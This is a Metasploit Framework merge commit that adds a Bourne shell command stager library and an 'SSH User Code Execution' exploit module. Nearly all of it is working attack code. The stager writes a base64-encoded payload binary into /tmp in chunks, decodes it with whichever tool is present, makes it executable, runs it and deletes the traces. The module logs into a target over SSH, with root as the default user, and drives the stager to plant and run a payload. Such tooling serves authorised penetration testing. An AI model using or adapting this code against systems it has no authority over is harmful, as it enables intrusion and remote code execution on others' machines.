Landing rapid7#1275, bash cmdstager

egypt · egypt · commit 61afe1449ea7 · 2013-05-15T10:44:05.000-05:00
Conflicts:
	lib/rex/exploitation/cmdstager.rb

Conflict was just the $Id$ tag, which is no longer used anyway.
diff --git a/lib/msf/core/exploit/cmdstager_bourne.rb b/lib/msf/core/exploit/cmdstager_bourne.rb
@@ -0,0 +1,21 @@
+# -*- coding: binary -*-
+
+require 'msf/core/exploit/cmdstager'
+
+module Msf
+
+###
+#
+# This mixin provides an interface for staging cmd to arbitrary payloads
+#
+###
+module Exploit::CmdStagerBourne
+
+	include Msf::Exploit::CmdStager
+
+	def create_stager(exe)
+		Rex::Exploitation::CmdStagerBourne.new(exe)
+	end
+end
+
+end
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
@@ -24,6 +24,7 @@
 require 'msf/core/exploit/cmdstager_debug_write'
 require 'msf/core/exploit/cmdstager_debug_asm'
 require 'msf/core/exploit/cmdstager_tftp'
+require 'msf/core/exploit/cmdstager_bourne'
 
 # Protocol
 require 'msf/core/exploit/tcp'
diff --git a/lib/rex/exploitation/cmdstager.rb b/lib/rex/exploitation/cmdstager.rb
@@ -1,8 +1,8 @@
 # -*- coding: binary -*-
-# $Id$
 
 require 'rex/exploitation/cmdstager/base'
 require 'rex/exploitation/cmdstager/vbs'
 require 'rex/exploitation/cmdstager/debug_write'
 require 'rex/exploitation/cmdstager/debug_asm'
 require 'rex/exploitation/cmdstager/tftp'
+require 'rex/exploitation/cmdstager/bourne'
diff --git a/lib/rex/exploitation/cmdstager/bourne.rb b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -0,0 +1,105 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+class CmdStagerBourne < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_encoded = Rex::Text.rand_text_alpha(5)
+		@var_decoded = Rex::Text.rand_text_alpha(5)
+	end
+
+	def generate(opts = {})
+		opts[:temp] = opts[:temp] || '/tmp/'
+		opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
+		opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
+		super
+	end
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo -n "
+		@cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple base64...
+	#
+	def encode_payload(opts)
+		Rex::Text.encode_base64(@exe)
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+		decoders = [
+			"base64 --decode -",
+			"openssl enc -d -A -base64 -in /dev/stdin",
+			"python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());'",
+			"perl -MMIME::Base64 -ne 'print decode_base64($_)'"
+		]
+		decoder_cmd = []
+		decoders.each do |cmd|
+			binary = cmd.split(' ')[0]
+			decoder_cmd << "(which #{binary} >&2 && #{cmd})"
+		end
+		decoder_cmd = decoder_cmd.join(" || ")
+		decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded}.bin < #{@tempdir}#{@var_encoded}.b64"
+		[ decoder_cmd ]
+	end
+
+	def compress_commands(cmds, opts)
+		# Make it all happen
+		cmds << "chmod +x #{@tempdir}#{@var_decoded}.bin"
+		cmds << "#{@tempdir}#{@var_decoded}.bin"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "rm -f #{@tempdir}#{@var_decoded}.bin"
+			cmds << "rm -f #{@tempdir}#{@var_encoded}.b64"
+		end
+
+		super
+	end
+
+	def cmd_concat_operator
+		" ; "
+	end
+
+end
+end
+end
diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
@@ -0,0 +1,132 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ManualRanking
+
+	include Msf::Exploit::CmdStagerBourne
+
+	attr_accessor :ssh_socket
+
+	def initialize
+		super(
+			'Name'        => 'SSH User Code Execution',
+			'Description' => %q{
+				This module utilizes a stager to upload a base64 encoded
+				binary which is then decoded, chmod'ed and executed from
+				the command shell.
+			},
+			'Author'      => ['Spencer McIntyre', 'Brandon Knight'],
+			'References'  =>
+				[
+					[ 'CVE', '1999-0502'] # Weak password
+				],
+			'License'     => MSF_LICENSE,
+			'Privileged'  => true,
+			'DefaultOptions' =>
+				{
+					'PrependFork' => 'true',
+					'EXITFUNC' => 'process'
+				},
+			'Payload'     =>
+				{
+					'Space'    => 4096,
+					'BadChars' => "",
+					'DisableNops' => true
+				},
+			'Platform'    => [ 'osx', 'linux' ],
+			'Targets'     =>
+				[
+					[ 'Linux x86',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						},
+					],
+					[ 'Linux x64',
+						{
+							'Arch' => ARCH_X86_64,
+							'Platform' => 'linux'
+						},
+					],
+					[ 'OSX x86',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'osx'
+						},
+					],
+				],
+			'DefaultTarget'  => 0,
+			# For the CVE
+			'DisclosureDate' => 'Jan 01 1999'
+		)
+
+		register_options(
+			[
+				OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
+				OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
+				OptString.new('RHOST', [ true, "The target address" ]),
+				Opt::RPORT(22)
+			], self.class
+		)
+
+		register_advanced_options(
+			[
+				OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
+			]
+		)
+	end
+
+	def execute_command(cmd, opts = {})
+		begin
+			Timeout.timeout(3) do
+				self.ssh_socket.exec!("#{cmd}\n")
+			end
+		rescue ::Exception
+		end
+	end
+
+	def do_login(ip, user, pass, port)
+		opt_hash = {
+			:auth_methods  => ['password', 'keyboard-interactive'],
+			:msframework   => framework,
+			:msfmodule     => self,
+			:port          => port,
+			:disable_agent => true,
+			:password      => pass
+		}
+
+		opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+		begin
+			self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
+		rescue Rex::ConnectionError, Rex::AddressInUse
+			fail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation')
+		rescue Net::SSH::Disconnect, ::EOFError
+			fail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation')
+		rescue Net::SSH::AuthenticationFailed
+			fail_with(Exploit::Failure::NoAccess, 'Failed authentication')
+		rescue Net::SSH::Exception => e
+			fail_with(Exploit::Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
+		end
+
+		if not self.ssh_socket
+			fail_with(Exploit::Failure::Unknown)
+		end
+		return
+	end
+
+	def exploit
+		do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
+
+		print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
+		execute_cmdstager({:linemax => 500})
+	end
+end
